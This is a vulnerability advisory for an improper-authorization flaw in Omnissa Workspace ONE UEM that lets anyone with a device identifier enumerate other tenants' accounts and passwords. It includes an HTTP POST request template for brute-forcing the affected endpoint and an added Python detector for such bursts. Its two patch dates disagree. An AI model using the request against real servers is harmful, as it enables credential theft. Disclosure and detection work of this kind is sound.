Advisory ID: SYSS-2025-049
Product: Workspace ONE UEM
Manufacturer: Omnissa
Affected Version(s): 24.6.0.21
Tested Version(s): 24.6.0.21
Vulnerability Type: Improper Authorization (CWE-285)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2025-07-18
Solution Date: 2025-11-12
Public Disclosure: 2026-02-13
CVE Reference: CVE-2025-25236
Author of Advisory: Philipp Buchegger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Omnissa Workspace ONE is software for managing endpoint devices.

The manufacturer describes the product as follows (see [1]):

"Manage, secure and monitor all devices across all platforms. [...]
With Omnissa Workspace ONE®, your organization can ease the operational
burden on your IT workforce via an autonomous workspace, freeing them to
focus on higher-value tasks."

Via an internet-exposed API, only the parameter "DeviceIdentifier" is
required to enumerate further information such as tenant IDs, user
accounts, and user passwords; the "DeviceIdentifier" does not have to be
assigned to a specific tenant.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Due to an internet-exposed API, it is possible to enumerate
customer-specific sensitive information like tenant IDs, user accounts,
and user passwords (see also SYSS-2025-047 [3]).

To enumerate this information, only an existing "DeviceIdentifier" is
required. This "DeviceIdentifier" does not need to be assigned to a
specific tenant in order to receive information assigned to other
tenants.
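Because a single unauthenticated endpoint answers enumeration requests for any tenant, the most useful defender-side signal is request volume against that path. The following added example (not part of the SySS advisory or the Omnissa product) parses constructed combined-format access-log lines and flags any source that POSTs to the authentication endpoint named in the PoC more than a threshold number of times within a sliding one-minute window; the log lines, IP addresses and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoint named in the advisory's PoC request.
TARGET_PATH = "/DeviceServices/awmdmsdk/v3/shareddevice/checkout/authenticate"

# Combined log format (nginx/Apache): ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])

def find_bursts(lines, threshold=5, window=timedelta(minutes=1)):
    """Map each source IP to its peak number of POSTs to TARGET_PATH inside
    any sliding `window`; only sources exceeding `threshold` are returned."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                      # skip malformed lines, do not crash
        ip, ts, method, path, _status = rec
        if method == "POST" and path == TARGET_PATH:
            hits[ip].append(ts)
    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        start, best = 0, 0
        for end, t in enumerate(stamps):  # two-pointer sliding window
            while t - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            flagged[ip] = best
    return flagged

# Constructed sample log: one source fires 8 requests in 35 s, a second
# source makes two legitimate-looking checkouts half an hour apart.
SAMPLE_LOG = [
    f'198.51.100.7 - - [13/Feb/2026:10:00:{s:02d} +0000] "POST {TARGET_PATH} HTTP/1.1" 401 87'
    for s in range(0, 40, 5)
] + [
    f'203.0.113.5 - - [13/Feb/2026:10:00:10 +0000] "POST {TARGET_PATH} HTTP/1.1" 200 512',
    f'203.0.113.5 - - [13/Feb/2026:10:30:10 +0000] "POST {TARGET_PATH} HTTP/1.1" 200 512',
    '203.0.113.5 - - [13/Feb/2026:10:00:12 +0000] "GET /DeviceServices/ HTTP/1.1" 200 1024',
]
```

Because the request body is not logged, the rule keys on path and rate only; pairing it with the vendor fix in OMSA-2025-0005 removes the information leak itself.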
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request can be used for a brute-force attack:

POST /DeviceServices/awmdmsdk/v3/shareddevice/checkout/authenticate HTTP/1.1
Host:
Content-Type: application/json
Accept: */*
Connection: keep-alive
Accept-Language: de-DE
Content-Length:
Accept-Encoding: gzip, deflate, br
User-Agent: Hub/4444 CFNetwork/3826.500.131 Darwin/24.5.0

{"DeviceIdentifier":"","GroupCode":"","Password":"","AuthenticationGroup":"com.air-watch.agent","Username":"","BundleId":"com.air-watch.agent","DeviceType":2}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Return feedback only if all relevant parameters match at once.

See https://www.omnissa.com/omsa-2025-0005

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-07-15: Vulnerability discovered
2025-07-18: Vulnerability reported to manufacturer
2025-09-10: Patch released by manufacturer
2026-02-13: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Omnissa Workspace ONE for Unified Endpoint Management
    https://go.omnissa.com/Workspace-ONE-for-UEM
[2] SySS Security Advisory SYSS-2025-049
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-049.txt
[3] SySS Security Advisory SYSS-2025-047
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-047.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Philipp Buchegger and
Sebastian Auwärter of SySS GmbH.
E-Mail: philipp.buchegger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Philipp_Buchegger.asc
Key ID: 0x065809F0BB6747E8
Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en